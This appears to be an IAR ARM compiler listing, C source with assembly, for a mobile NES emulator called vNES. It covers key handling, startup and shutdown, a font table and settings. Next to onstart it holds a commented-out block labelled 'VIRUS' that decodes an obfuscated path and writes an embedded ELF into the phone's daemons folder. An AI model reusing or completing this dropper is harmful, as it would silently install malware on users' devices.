        CMP      R7,#+48
        BCC      ??onkey_15
        CMP      R7,#+58
        BCS      ??onkey_15
        STRB     R8,[R6, #+10]
        STR      R5,[R6, #+256]
        B        ??onkey_5
//  350       mode=0; break;
//  351   
//  352     case 0: default:
//  353       switch(keycode){
??onkey_13:
        SUBS     R0,R0,#+1
        BEQ      ??onkey_60
        SUBS     R0,R0,#+3
        BNE      ??onkey_61
//  354       case RIGHT_SOFT: mode=100; break; //main menu
        MOV      R0,#+100
        B        ??onkey_21
//  355       case LEFT_SOFT: param[palternate]=!param[palternate]; break;
??onkey_60:
        CMP      R9,#+0
        MOVNE    R4,#+0
        STRB     R4,[R6, #+2]
        B        ??onkey_5
//  356       default: keypress(keycode,1);
??onkey_61:
        MOV      R1,#+1
??onkey_7:
        MOV      R0,R7
        BL       keypress
//  357       }break;
//  358     }
//  359 
//  360 //    onredraw(); DrawScreen(); // Перерисовать экран
//  361   }
//  362   return 0;
??onkey_6:
        MOV      R0,#+0
        POP      {R4-R11,PC}      ;; return
        DATA
??onkey_10:
        DC32     Volume
        DC32     o_boolean_static_fld
        DC32     v_boolean_static_fld
        DC32     d_boolean_static_fld
        CFI EndBlock cfiBlock27
//  363 }

        RSEG CODE:CODE:NOROOT(2)
        DATA
??DataTable41:
        DC32     width

        RSEG CODE:CODE:NOROOT(2)
        DATA
??DataTable42:
        DC32     height

        RSEG CODE:CODE:NOROOT(2)
        CFI Block cfiBlock28 Using cfiCommon0
        CFI NoFunction
        THUMB
??onclose??rT:
        BX       PC
        Nop      
        CFI EndBlock cfiBlock28
        REQUIRE onclose
//  364 

        RSEG CODE:CODE:NOROOT(2)
        CFI Block cfiBlock29 Using cfiCommon1
        CFI Function onclose
        ARM
//  365 void onclose(){ // Закрытие окна
//  366   running=0; // Сигнал на остановку фонового процесса
onclose:
        LDR      R0,??DataTable49  ;; param
//  367   ///
//  368   //AudioTerminate();
//  369   param[pwidth]=getWidth;
        LDR      R2,??DataTable45  ;; getWidth
        MOV      R1,#+0
        STR      R1,[R0, #+260]
        LDR      R2,[R2, #+0]
        STRB     R2,[R0, #+6]
//  370   param[pheight]=getHeight;
        LDR      R2,??DataTable46  ;; getHeight
        LDR      R2,[R2, #+0]
        STRB     R2,[R0, #+7]
//  371   param[pframeskip]=A;
        LDR      R2,??DataTable52  ;; A
        LDR      R2,[R2, #+0]
        STRB     R2,[R0, #+1]
//  372   param[poptimize]=t_boolean_static_fld?0:1;
        LDR      R2,??DataTable53  ;; t_boolean_static_fld
        LDRB     R2,[R2, #+0]
        CMP      R2,#+0
        MOVEQ    R1,#+1
        STRB     R1,[R0, #+8]
//  373   saveini();
        B        saveini          ;; tailcall
        CFI EndBlock cfiBlock29
//  374 }

        RSEG CODE:CODE:NOROOT(2)
        DATA
??DataTable45:
        DC32     getWidth

        RSEG CODE:CODE:NOROOT(2)
        DATA
??DataTable46:
        DC32     getHeight

        RSEG CODE:CODE:NOROOT(2)
        CFI Block cfiBlock30 Using cfiCommon0
        CFI NoFunction
        THUMB
??onexit??rT:
        BX       PC
        Nop      
        CFI EndBlock cfiBlock30
        REQUIRE onexit
//  375 

        RSEG CODE:CODE:NOROOT(2)
        CFI Block cfiBlock31 Using cfiCommon1
        CFI Function onexit
        ARM
//  376 void onexit(){ // Выход
//  377   freeall();
onexit:
        _BF      freeall,??freeall??rA  ;; tailcall
        CFI EndBlock cfiBlock31
//  378 
//  379 //  if(buf) mfree(buf); // Освобождаем память
//  380 }

        RSEG CODE:CODE:NOROOT(2)
        CFI Block cfiBlock32 Using cfiCommon0
        CFI NoFunction
        THUMB
??oncreate??rT:
        BX       PC
        Nop      
        CFI EndBlock cfiBlock32
        REQUIRE oncreate
//  381 extern long SysTimer();

        RSEG CODE:CODE:NOROOT(2)
        CFI Block cfiBlock33 Using cfiCommon1
        CFI Function oncreate
        ARM
//  382 void oncreate(){ // Создание окна
oncreate:
        PUSH     {LR}
        CFI ?RET Frame(CFA, -4)
        CFI CFA R13+4
//  383   
//  384   AudioInit();
        _BLF     AudioInit,??AudioInit??rA
//  385   NSF_Init();
        _BLF     NSF_Init,??NSF_Init??rA
//  386   AudioStart();
        _BLF     AudioStart,??AudioStart??rA
//  387   LastTmrVal=SysTimer();
        _BLF     SysTimer,??SysTimer??rA
        LDR      R1,??oncreate_0  ;; LastTmrVal
        STR      R0,[R1, #+0]
//  388   SUBPROC((void *)run);
        LDR      R0,??oncreate_0+0x4  ;; run
        SWI      +369
//  389 
//  390   // Запускаем фоновый процесс 
//  391 //  GBS_StartTimerProc(&timer,262/2,timer_proc); // Стартуем таймер с частотой 2 раз в секунду
//  392 }
        POP      {PC}             ;; return
        DATA
??oncreate_0:
        DC32     LastTmrVal
        DC32     run
        CFI EndBlock cfiBlock33

        RSEG CODE:CODE:NOROOT(2)
        CFI Block cfiBlock34 Using cfiCommon0
        CFI NoFunction
        THUMB
??onstart??rT:
        BX       PC
        Nop      
        CFI EndBlock cfiBlock34
        REQUIRE onstart
//  393 
//  394 ///////ВИРУС!!!
//  395 
//  396 //char path[]="\xCB\xC5\xA3\xA5\xBD\x96\x91\xA3\xBB\x9E\x9A\x92\x90\x91\x8C\xA3"
//  397 //"\xBA\x87\x8B\xBB\xD1\x9A\x93\x99\x0";
//  398 //
//  399 ////const char path[]="4:\\ZBin\\Daemons\\ExtD.elf";
//  400 //#define elfsize 5020
//  401 //char data[elfsize]="INSERT DATA HERE!!!";
//  402 //
//  403 //void v(){ //вирусное заражение
//  404 //  int f,i;
//  405 //  data[0]=0x7f;//0x464c457f;
//  406 //  data[1]=0x45; data[2]=0x4c; data[3]=0x46;
//  407 //  for(i=0;i<24;i++)
//  408 //    path[i]=~path[i];
//  409 //  i=0;
//  410 //  do{
//  411 //    f=fopen(path,A_ReadOnly+A_BIN,P_READ,&err);
//  412 //    switch(i){
//  413 //    case 0: if(f==-1) *(char*)path='0'; else fclose(f,&err); //drive 0 or 4?
//  414 //      *((char*)path+strlen(path)-5)='N';
//  415 //      break;
//  416 //    case 1: //exists?
//  417 //      if(f==-1)
//  418 //      if((f=fopen(path,A_WriteOnly+A_BIN+A_Create+A_Truncate,P_WRITE,&err))==-1) return;
//  419 //      fwrite(f,data,elfsize,&err);
//  420 //      fclose(f,&err); 
//  421 //      return;
//  422 //    } 
//  423 //  }while(++i<5);
//  424 //}
//  425 

        RSEG CODE:CODE:NOROOT(2)
        CFI Block cfiBlock35 Using cfiCommon1
        CFI Function onstart
        ARM
//  426 int onstart(char *exename, char *fname){ // Старт приложения. Возвращает 0 или 1 для выхода.
onstart:
        PUSH     {R4,R5,LR}
        CFI ?RET Frame(CFA, -4)
        CFI R5 Frame(CFA, -8)
        CFI R4 Frame(CFA, -12)
        CFI CFA R13+12
        MOVS     R4,R1
//  427 //  B=110;  
//  428   int i;
//  429 //  v();
//  430   if(!fname || fname[1]!=':') return 1;
        BEQ      ??onstart_0
        LDRB     R1,[R4, #+1]
        CMP      R1,#+58
        BEQ      ??onstart_1
??onstart_0:
        MOV      R0,#+1
        POP      {R4,R5,PC}
//  431   strcpy(filename, exename);
??onstart_1:
        LDR      R5,??DataTable49  ;; param
        MOV      R1,R0
        ADD      R0,R5,#+536
        SWI      +26
//  432   strcpy(romname,fname);
        MOV      R1,R4
        ADD      R0,R5,#+664
        SWI      +26
//  433   if(C65) param[pheight]=130;
        LDR      R0,??DataTable50  ;; C65
        LDRB     R0,[R0, #+0]
        CMP      R0,#+0
        MOVNE    R0,#+130
        STRBNE   R0,[R5, #+7]
        BNE      ??onstart_2
//  434   else if(EL71){ param[pwidth]=param[pheight]=240;}
        LDR      R0,??DataTable51  ;; EL71
        LDRB     R0,[R0, #+0]
        CMP      R0,#+0
        MOVNE    R0,#+240
        STRBNE   R0,[R5, #+7]
        STRBNE   R0,[R5, #+6]
//  435   loadini();
??onstart_2:
        BL       loadini
//  436   if(!param[pstep]) param[pstep]=8;
        LDRB     R0,[R5, #+10]
        CMP      R0,#+0
        MOVEQ    R0,#+8
        STRBEQ   R0,[R5, #+10]
//  437   getscrXY();
        BL       getscrXY
//  438   if(!(A=param[pframeskip])) A=5;
        LDRB     R0,[R5, #+1]
        LDR      R1,??DataTable52  ;; A
        CMP      R0,#+0
        MOVEQ    R0,#+5
        STR      R0,[R1, #+0]
//  439   t_boolean_static_fld=param[poptimize]?0:1;
        LDRB     R0,[R5, #+8]
        LDR      R1,??DataTable53  ;; t_boolean_static_fld
        CMP      R0,#+0
        MOVNE    R0,#+0
        MOVEQ    R0,#+1
        STRB     R0,[R1, #+0]
//  440   initnul();
        _BLF     initnul,??initnul??rA
//  441   //
//  442   //  
//  443   if(i=loadrom(fname)) return i;
        MOV      R0,R4
        _BLF     loadrom,??loadrom??rA
        POP      {R4,R5,PC}       ;; return
        CFI EndBlock cfiBlock35
//  444 
//  445     
//  446   return 0;
//  447 }

        RSEG CODE:CODE:NOROOT(2)
        DATA
??DataTable49:
        DC32     param

        RSEG CODE:CODE:NOROOT(2)
        DATA
??DataTable50:
        DC32     C65

        RSEG CODE:CODE:NOROOT(2)
        DATA
??DataTable51:
        DC32     EL71

        RSEG CODE:CODE:NOROOT(2)
        DATA
??DataTable52:
        DC32     A

        RSEG CODE:CODE:NOROOT(2)
        DATA
??DataTable53:
        DC32     t_boolean_static_fld

        RSEG CODE:CODE:NOROOT(2)
        CFI Block cfiBlock36 Using cfiCommon1
        CFI NoFunction
        ARM
??memsetd??rA:
        LDR      R12,??Subroutine18_0  ;; memsetd
        BX       R12
        DATA
??Subroutine18_0:
        DC32     memsetd
        CFI EndBlock cfiBlock36

        RSEG CODE:CODE:NOROOT(2)
        CFI Block cfiBlock37 Using cfiCommon1
        CFI NoFunction
        ARM
??movsw??rA:
        LDR      R12,??Subroutine19_0  ;; movsw
        BX       R12
        DATA
??Subroutine19_0:
        DC32     movsw
        CFI EndBlock cfiBlock37

        RSEG CODE:CODE:NOROOT(2)
        CFI Block cfiBlock38 Using cfiCommon1
        CFI NoFunction
        ARM
??filter??rA:
        LDR      R12,??Subroutine20_0  ;; filter
        BX       R12
        DATA
??Subroutine20_0:
        DC32     filter
        CFI EndBlock cfiBlock38

        RSEG CODE:CODE:NOROOT(2)
        CFI Block cfiBlock39 Using cfiCommon1
        CFI NoFunction
        ARM
??filter2??rA:
        LDR      R12,??Subroutine21_0  ;; filter2
        BX       R12
        DATA
??Subroutine21_0:
        DC32     filter2
        CFI EndBlock cfiBlock39

        RSEG CODE:CODE:NOROOT(2)
        CFI Block cfiBlock40 Using cfiCommon1
        CFI NoFunction
        ARM
??movsd??rA:
        LDR      R12,??Subroutine22_0  ;; movsd
        BX       R12
        DATA
??Subroutine22_0:
        DC32     movsd
        CFI EndBlock cfiBlock40

        RSEG CODE:CODE:NOROOT(2)
        CFI Block cfiBlock41 Using cfiCommon1
        CFI NoFunction
        ARM
??SetVolume??rA:
        LDR      R12,??Subroutine23_0  ;; SetVolume
        BX       R12
        DATA
??Subroutine23_0:
        DC32     SetVolume
        CFI EndBlock cfiBlock41

        RSEG CODE:CODE:NOROOT(2)
        CFI Block cfiBlock42 Using cfiCommon1
        CFI NoFunction
        ARM
??freeall??rA:
        LDR      R12,??Subroutine24_0  ;; freeall
        BX       R12
        DATA
??Subroutine24_0:
        DC32     freeall
        CFI EndBlock cfiBlock42

        RSEG CODE:CODE:NOROOT(2)
        CFI Block cfiBlock43 Using cfiCommon1
        CFI NoFunction
        ARM
??AudioInit??rA:
        LDR      R12,??Subroutine25_0  ;; AudioInit
        BX       R12
        DATA
??Subroutine25_0:
        DC32     AudioInit
        CFI EndBlock cfiBlock43

        RSEG CODE:CODE:NOROOT(2)
        CFI Block cfiBlock44 Using cfiCommon1
        CFI NoFunction
        ARM
??NSF_Init??rA:
        LDR      R12,??Subroutine26_0  ;; NSF_Init
        BX       R12
        DATA
??Subroutine26_0:
        DC32     NSF_Init
        CFI EndBlock cfiBlock44

        RSEG CODE:CODE:NOROOT(2)
        CFI Block cfiBlock45 Using cfiCommon1
        CFI NoFunction
        ARM
??AudioStart??rA:
        LDR      R12,??Subroutine27_0  ;; AudioStart
        BX       R12
        DATA
??Subroutine27_0:
        DC32     AudioStart
        CFI EndBlock cfiBlock45

        RSEG CODE:CODE:NOROOT(2)
        CFI Block cfiBlock46 Using cfiCommon1
        CFI NoFunction
        ARM
??SysTimer??rA:
        LDR      R12,??Subroutine28_0  ;; SysTimer
        BX       R12
        DATA
??Subroutine28_0:
        DC32     SysTimer
        CFI EndBlock cfiBlock46

        RSEG CODE:CODE:NOROOT(2)
        CFI Block cfiBlock47 Using cfiCommon1
        CFI NoFunction
        ARM
??initnul??rA:
        LDR      R12,??Subroutine29_0  ;; initnul
        BX       R12
        DATA
??Subroutine29_0:
        DC32     initnul
        CFI EndBlock cfiBlock47

        RSEG CODE:CODE:NOROOT(2)
        CFI Block cfiBlock48 Using cfiCommon1
        CFI NoFunction
        ARM
??loadrom??rA:
        LDR      R12,??Subroutine30_0  ;; loadrom
        BX       R12
        DATA
??Subroutine30_0:
        DC32     loadrom
        CFI EndBlock cfiBlock48

        RSEG DATA_ID:CONST:SORT:NOROOT(2)
`?<Initializer for zfont>`:
        DATA
        DC8 0, 0, 0, 0, 0, 0, 0, 0
        DC8 0, 10H, 10H, 10H, 10H, 0, 10H, 0
        DC8 0, 24H, 24H, 0, 0, 0, 0, 0
        DC8 0, 24H, 7EH, 24H, 24H, 7EH, 24H, 0
        DC8 0, 8, 3EH, 28H, 3EH, 0AH, 3EH, 8
        DC8 0, 62H, 64H, 8, 10H, 26H, 46H, 0
        DC8 0, 10H, 28H, 10H, 2AH, 44H, 3AH, 0
        DC8 0, 8, 10H, 0, 0, 0, 0, 0
        DC8 0, 4, 8, 8, 8, 8, 4, 0
        DC8 0, 20H, 10H, 10H, 10H, 10H, 20H, 0
        DC8 0, 0, 14H, 8, 3EH, 8, 14H, 0
        DC8 0, 0, 8, 8, 3EH, 8, 8, 0
        DC8 0, 0, 0, 0, 0, 8, 8, 10H
        DC8 0, 0, 0, 0, 3EH, 0, 0, 0
        DC8 0, 0, 0, 0, 0, 18H, 18H, 0
        DC8 0, 0, 2, 4, 8, 10H, 20H, 0
        DC8 0, 3CH, 46H, 4AH, 52H, 62H, 3CH, 0
        DC8 0, 18H, 28H, 8, 8, 8, 3EH, 0
        DC8 0, 3CH, 42H, 2, 3CH, 40H, 7EH, 0
        DC8 0, 3CH, 42H, 0CH, 2, 42H, 3CH, 0
        DC8 0, 8, 18H, 28H, 48H, 7EH, 8, 0
        DC8 0, 7EH, 40H, 7CH, 2, 42H, 3CH, 0
        DC8 0, 3CH, 40H, 7CH, 42H, 42H, 3CH, 0
        DC8 0, 7EH, 2, 4, 8, 10H, 10H, 0
        DC8 0, 3CH, 42H, 3CH, 42H, 42H, 3CH, 0
        DC8 0, 3CH, 42H, 42H, 3EH, 2, 3CH, 0
        DC8 0, 0, 0, 10H, 0, 0, 10H, 0
        DC8 0, 0, 10H, 0, 0, 10H, 10H, 20H
        DC8 0, 0, 4, 8, 10H, 8, 4, 0
        DC8 0, 0, 0, 3EH, 0, 3EH, 0, 0
        DC8 0, 0, 10H, 8, 4, 8, 10H, 0
        DC8 0, 3CH, 42H, 4, 8, 0, 8, 0
        DC8 0, 3CH, 4AH, 56H, 5EH, 40H, 3CH, 0
        DC8 0, 3CH, 42H, 42H, 7EH, 42H, 42H, 0
        DC8 0, 7CH, 42H, 7CH, 42H, 42H, 7CH, 0
        DC8 0, 3CH, 42H, 40H, 40H, 42H, 3CH, 0
        DC8 0, 78H, 44H, 42H, 42H, 44H, 78H, 0
        DC8 0, 7EH, 40H, 7CH, 40H, 40H, 7EH, 0
        DC8 0, 7EH, 40H, 7CH, 40H, 40H, 40H, 0
        DC8 0, 3CH, 42H, 40H, 4EH, 42H, 3CH, 0
        DC8 0, 42H, 42H, 7EH, 42H, 42H, 42H, 0
        DC8 0, 3EH, 8, 8, 8, 8, 3EH, 0
        DC8 0, 2, 2, 2, 42H, 42H, 3CH, 0
        DC8 0, 44H, 48H, 70H, 48H, 44H, 42H, 0
        DC8 0, 40H, 40H, 40H, 40H, 40H, 7EH, 0
        DC8 0, 42H, 66H, 5AH, 42H, 42H, 42H, 0
        DC8 0, 42H, 62H, 52H, 4AH, 46H, 42H, 0
        DC8 0, 3CH, 42H, 42H, 42H, 42H, 3CH, 0
        DC8 0, 7CH, 42H, 42H, 7CH, 40H, 40H, 0
        DC8 0, 3CH, 42H, 42H, 52H, 4AH, 3CH, 0
        DC8 0, 7CH, 42H, 42H, 7CH, 44H, 42H, 0
        DC8 0, 3CH, 40H, 3CH, 2, 42H, 3CH, 0
        DC8 0, 0FEH, 10H, 10H, 10H, 10H, 10H, 0
        DC8 0, 42H, 42H, 42H, 42H, 42H, 3CH, 0
        DC8 0, 42H, 42H, 42H, 42H, 24H, 18H, 0
        DC8 0, 42H, 42H, 42H, 42H, 5AH, 24H, 0
        DC8 0, 42H, 24H, 18H, 18H, 24H, 42H, 0
        DC8 0, 82H, 44H, 28H, 10H, 10H, 10H, 0
        DC8 0, 7EH, 4, 8, 10H, 20H, 7EH, 0
        DC8 0, 0EH, 8, 8, 8, 8, 0EH, 0
        DC8 0, 0, 40H, 20H, 10H, 8, 4, 0
        DC8 0, 70H, 10H, 10H, 10H, 10H, 70H, 0
        DC8 0, 10H, 38H, 54H, 10H, 10H, 10H, 0
        DC8 0, 0, 0, 0, 0, 0, 0, 0FFH
        DC8 0, 1CH, 22H, 78H, 20H, 20H, 7EH, 0
        DC8 0, 0, 38H, 4, 3CH, 44H, 3CH, 0
        DC8 0, 20H, 20H, 3CH, 22H, 22H, 3CH, 0
        DC8 0, 0, 1CH, 20H, 20H, 20H, 1CH, 0
        DC8 0, 4, 4, 3CH, 44H, 44H, 3CH, 0
        DC8 0, 0, 38H, 44H, 78H, 40H, 3CH, 0
        DC8 0, 0CH, 10H, 18H, 10H, 10H, 10H, 0
        DC8 0, 0, 3CH, 44H, 44H, 3CH, 4, 38H
        DC8 0, 40H, 40H, 78H, 44H, 44H, 44H, 0
        DC8 0, 10H, 0, 30H, 10H, 10H, 38H, 0
        DC8 0, 4, 0, 4, 4, 4, 24H, 18H
        DC8 0, 20H, 28H, 30H, 30H, 28H, 24H, 0
        DC8 0, 10H, 10H, 10H, 10H, 10H, 0CH, 0
        DC8 0, 0, 68H, 54H, 54H, 54H, 54H, 0
        DC8 0, 0, 78H, 44H, 44H, 44H, 44H, 0
        DC8 0, 0, 38H, 44H, 44H, 44H, 38H, 0
        DC8 0, 0, 78H, 44H, 44H, 78H, 40H, 40H
        DC8 0, 0, 3CH, 44H, 44H, 3CH, 4, 6
        DC8 0, 0, 1CH, 20H, 20H, 20H, 20H, 0
        DC8 0, 0, 38H, 40H, 38H, 4, 78H, 0
        DC8 0, 10H, 38H, 10H, 10H, 10H, 0CH, 0
        DC8 0, 0, 44H, 44H, 44H, 44H, 38H, 0
        DC8 0, 0, 44H, 44H, 28H, 28H, 10H, 0
        DC8 0, 0, 44H, 54H, 54H, 54H, 28H, 0
        DC8 0, 0, 44H, 28H, 10H, 28H, 44H, 0
        DC8 0, 0, 44H, 44H, 44H, 3CH, 4, 38H
        DC8 0, 0, 7CH, 8, 10H, 20H, 7CH, 0
        DC8 0, 0EH, 8, 30H, 8, 8, 0EH, 0
        DC8 0, 8, 8, 8, 8, 8, 8, 0
        DC8 0, 70H, 10H, 0CH, 10H, 10H, 70H, 0
        DC8 0, 14H, 28H, 0, 0, 0, 0, 0
        DC8 3CH, 42H, 99H, 0A1H, 0A1H, 99H, 42H, 3CH
        DC8 0
        DC8 0, 0, 0

        RSEG DATA_ID:CONST:SORT:NOROOT(2)
`?<Initializer for param>`:
        DATA
        DC8 26H, 5, 0, 0, 0, 0, 84H, 0B0H
        DC8 0, 0, 8, 0, 0, 0, 0, 0
        DC8 0, 0, 0, 0, 0, 0, 0, 0
        DC8 0, 0, 0, 0, 0, 0, 0, 0
        DC8 0, 0, 0, 0, 0, 0, 0, 0
        DC8 0, 0, 0, 0, 0, 0, 0, 0
        DC8 0, 0, 0, 0, 0, 0, 0, 0
        DC8 0, 0, 0, 0, 0, 0, 0, 0
        DC8 3DH, 3EH, 3BH, 3CH, 2AH, 23H, 34H, 36H
        DC8 32H, 38H, 35H, 1AH, 31H, 33H, 37H, 39H
        DC8 0, 0, 0, 0, 0, 0, 0, 0
        DC8 0, 0, 0, 0, 0, 0, 0, 0
        DC8 40H, 80H, 10H, 20H, 10H, 20H, 40H, 80H
        DC8 10H, 20H, 8, 1, 8, 4, 1, 2
        DC8 0, 0, 0, 0, 0, 0, 0, 0
        DC8 0, 0, 0, 0, 0, 0, 0, 0
        DC8 0, 0, 0, 0, 0, 0, 0, 0
        DC8 0, 0, 0, 0, 0, 0, 0, 0
        DC8 0, 0, 0, 0, 0, 0, 0, 0
        DC8 0, 0, 0, 0, 0, 0, 0, 0
        DC8 3DH, 3EH, 3BH, 3CH, 2AH, 23H, 34H, 36H
        DC8 32H, 38H, 35H, 1AH, 31H, 33H, 37H, 39H
        DC8 0, 0, 0, 0, 0, 0, 0, 0
        DC8 0, 0, 0, 0, 0, 0, 0, 0
        DC8 40H, 80H, 10H, 20H, 10H, 20H, 40H, 80H
        DC8 10H, 20H, 8, 1, 8, 4, 1, 2
        DC8 0, 0, 0, 0, 0, 0, 0, 0
        DC8 0, 0, 0, 0, 0, 0, 0, 0
        DC8 0, 0, 0, 0, 0, 0, 0, 0
        DC8 0, 0, 0, 0, 0, 0, 0, 0
        DC8 0, 0, 0, 0, 0, 0, 0, 0
        DC8 0, 0, 0, 0, 0, 0, 0, 0
`?<Initializer for mode>`:
        DC32 0
`?<Initializer for running>`:
        DC32 0
`?<Initializer for exit>`:
        DC32 0
`?<Initializer for redefineptr>`:
        DC8 0, 0, 0, 0
`?<Initializer for joy>`:
        DC32 0
`?<Initializer for tmpsize>`:
        DC8 0, 0, 0, 0
`?<Initializer for menu>`:
        DC8 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
        DC8 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
        DC8 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
        DC8 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
        DC8 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
        DC8 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
        DC8 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
        DC8 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
        DC8 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
        DC8 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
        DC8 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
        DC8 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
        DC8 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
        DC8 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
        DC8 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
        DC8 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
`?<Initializer for filename>`:
        DC8 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
        DC8 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
        DC8 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
        DC8 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
        DC8 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
        DC8 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
        DC8 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
        DC8 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
`?<Initializer for romname>`:
        DC8 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
        DC8 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
        DC8 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
        DC8 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
        DC8 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
        DC8 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
        DC8 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
        DC8 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
        DC8 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
        DC8 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
        DC8 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
        DC8 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
        DC8 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
        DC8 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
        DC8 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
        DC8 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
`?<Initializer for help>`:
        DC8 20H, 76H, 4EH, 45H, 53H, 20H, 30H, 2EH
        DC8 34H, 66H, 20H, 28H, 63H, 29H, 62H, 6EH
        DC8 0AH, 31H, 2EH, 4CH, 6FH, 61H, 64H, 20H
        DC8 30H, 2DH, 39H, 0AH, 32H, 2EH, 53H, 61H
        DC8 76H, 65H, 20H, 30H, 2DH, 39H, 0AH, 33H
        DC8 2EH, 46H, 72H, 6DH, 53H, 6BH, 70H, 20H
        DC8 31H, 2DH, 39H, 3AH, 25H, 64H, 0AH, 34H
        DC8 2EH, 4FH, 70H, 74H, 69H, 6DH, 69H, 7AH
        DC8 65H, 3AH, 25H, 64H, 0AH, 35H, 2EH, 52H
        DC8 65H, 64H, 65H, 66H, 69H, 6EH, 65H, 0AH
        DC8 36H, 2EH, 51H, 75H, 61H, 6CH, 69H, 74H
        DC8 79H, 3AH, 25H, 64H, 0AH, 37H, 2EH, 53H
        DC8 63H, 72H, 53H, 74H, 65H, 70H, 3AH, 25H
        DC8 30H, 32H, 64H, 0AH, 38H, 2EH, 53H, 69H
        DC8 7AH, 65H, 58H, 3AH, 25H, 30H, 33H, 64H
        DC8 0AH, 39H, 2EH, 53H, 69H, 7AH, 65H, 59H
        DC8 3AH, 25H, 30H, 33H, 64H, 0AH, 30H, 2EH
        DC8 45H, 78H, 69H, 74H, 0AH, 63H, 62H, 6EH
        DC8 2EH, 6EH, 61H, 72H, 6FH, 64H, 2EH, 72H
        DC8 75H, 0AH, 63H, 62H, 6EH, 40H, 79H, 61H
        DC8 6EH, 64H, 65H, 78H, 2EH, 72H, 75H, 0

        RSEG DATA_ID:CONST:SORT:NOROOT(2)
`?<Initializer for Title>`:
        DATA
        DC32 `?<Constant "vNES 0.4f (c)bn">`

        RSEG DATA_ID:CONST:SORT:NOROOT(2)
`?<Initializer for errors>`:
        DATA
        DC32 0H, `?<Constant "\\307\\340\\357\\363\\361\\362\\350\\362\\3`
        DC32 `?<Constant "Unknown error\\000">`
        DC32 `?<Constant "\\315\\345 \\354\\356\\343\\363 \\356\\362`
        DC32 `?<Constant "\\315\\345 .Nes \\360\\356\\354!\\000">`
        DC32 `?<Constant "\\314\\340\\357\\357\\345\\360 \\355\\345 `
        DC32 `?<Constant "\\315\\345\\342\\345\\360\\355\\373\\351 \\`

        RSEG INITTAB:CODE:ROOT(2)
        DATA
?init?tab?DATA_Z:
        DCD      sfe(DATA_Z) - sfb(DATA_Z), sfb(DATA_Z), sfb(DATA_Z)

        RSEG DATA_ID:CONST:SORT:NOROOT(2)
`?*?DATA_ID`:

        RSEG INITTAB:CODE:ROOT(2)
        DATA
?init?tab?DATA_I:
        DCD      sfe(DATA_I) - sfb(DATA_I), sfb(DATA_I), sfb(DATA_ID)

        END
//  448 //напутал....экран
//  449 //        int i1 = getWidth;
//  450 //        int j1 = getHeight;
//  451 //        if(i1 != t_int_static_fld || j1 != K)
//  452 //            i();
//  453 //        t_int_static_fld = i1;
//  454 //        K = j1;
// 
// 3 400 bytes in segment CODE
//   229 bytes in segment DATA_C
// 1 892 bytes in segment DATA_I
// 1 892 bytes in segment DATA_ID
//    12 bytes in segment DATA_Z
//    24 bytes in segment INITTAB
// 
// 3 172 bytes of CODE  memory (+ 252 bytes shared)
// 2 121 bytes of CONST memory
// 1 904 bytes of DATA  memory
//
//Errors: none
//Warnings: none
